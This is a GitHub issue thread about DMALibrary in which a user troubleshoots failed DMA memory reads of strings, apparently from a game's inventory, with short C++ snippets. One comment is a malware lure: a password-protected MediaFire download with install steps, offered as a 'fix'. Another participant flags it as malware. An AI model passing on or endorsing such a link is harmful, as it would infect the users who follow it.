### ISSUE TITLE
VMMDLL_MemReadEx is unable to read the data

### ISSUE THREAD

**Issue by lishaoju** [Metick/DMALibrary#29]
When I try to read the item name from the inventory, I can't retrieve it. However, after accessing the pointer once using CE, I can successfully read the name via DMA. How should I handle this situation?

**Comment by CheetoTrump** [comment]
your probably making a mistake in your code, you will get help quicker if you show what your doing instead of a broad question

**Comment by lishaoju** [comment]
> your probably making a mistake in your code, you will get help quicker if you show what your doing instead of a broad question

> wchar_t Value1[256]{};
wchar_t Value2[256]{};
VMMDLL_MemReadEx(Dma.Function.GetHandle(), Dma.Process.Get_Current().Pid, 0x1F1D661A000 + 0x14, reinterpret_cast<PBYTE>(&Value1), sizeof(Value1), NULL, VMMDLL_FLAG_FORCECACHE_READ_DISABLE);
VMMDLL_MemReadEx(Dma.Function.GetHandle(), Dma.Process.Get_Current().Pid, 0x1F1D65C48C0 + 0x14, reinterpret_cast<PBYTE>(&Value2), sizeof(Value2), NULL, VMMDLL_FLAG_FORCECACHE_READ_DISABLE);
wprintf(L"Value1 = [%s]\nValue2 = [%s]\n", Value1, Value2);
Value1 = [snowballgun]
Value2 = []

> 
Thank you for your reply
When I use CheatEngine to access the pointer at 0x1F1D661A000 + 0x14 once, DMA can read the characters

**Comment by Metick** [comment]
Why not just use
```
wchar_t value[256] = {};
mem.Read(0x1F1D661A000 + 0x14, value, sizeof(value));
```

that should work (:

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by CheetoTrump** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

dont listen to this person, this is 100% malware that sideloads payloads

**Comment by lishaoju** [comment]
> 为什么不直接使用
> 
> ```
> wchar_t value[256] = {};
> mem.Read(0x1F1D661A000 + 0x14, value, sizeof(value));
> ```
> 
> 那应该可以 （：

I tried it, but it still doesn't work, including all the flags

**Comment by lishaoju** [comment]
> > hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx
> 
> dont listen to this person, this is 100% malware that sideloads payloads

Bro, thanks for the reminder, I won't download it

**Comment by lishaoju** [comment]
> Why not just use
> 
> ```
> wchar_t value[256] = {};
> mem.Read(0x1F1D661A000 + 0x14, value, sizeof(value));
> ```
> 
> that should work (:

I've never encountered this issue when using drivers or injection methods. I currently suspect that it might be because the DMA isn't retrieving data from this region. When I access it once using the CE debugger, it seems to get activated or something similar

**Comment by Metick** [comment]
> > Why not just use
> > ```
> > wchar_t value[256] = {};
> > mem.Read(0x1F1D661A000 + 0x14, value, sizeof(value));
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > that should work (:
> 
> I've never encountered this issue when using drivers or injection methods. I currently suspect that it might be because the DMA isn't retrieving data from this region. When I access it once using the CE debugger, it seems to get activated or something similar

You're most likely doing something wrong then unless it's paged out, but that chance is pretty low

**Comment by lishaoju** [comment]
> > > Why not just use
> > > ```
> > > wchar_t value[256] = {};
> > > mem.Read(0x1F1D661A000 + 0x14, value, sizeof(value));
> > > ```
> > > 
> > > 
> > >     
> > >       
> > >     
> > > 
> > >       
> > >     
> > > 
> > >     
> > >   
> > > that should work (:
> > 
> > 
> > I've never encountered this issue when using drivers or injection methods. I currently suspect that it might be because the DMA isn't retrieving data from this region. When I access it once using the CE debugger, it seems to get activated or something similar
> 
> You're most likely doing something wrong then unless it's paged out, but that chance is pretty low

Alright, I'll use it like this for now. This is a list of names, for example, there are 100 in total. Some of them just can't be retrieved, limited to strings
Thank you for your response
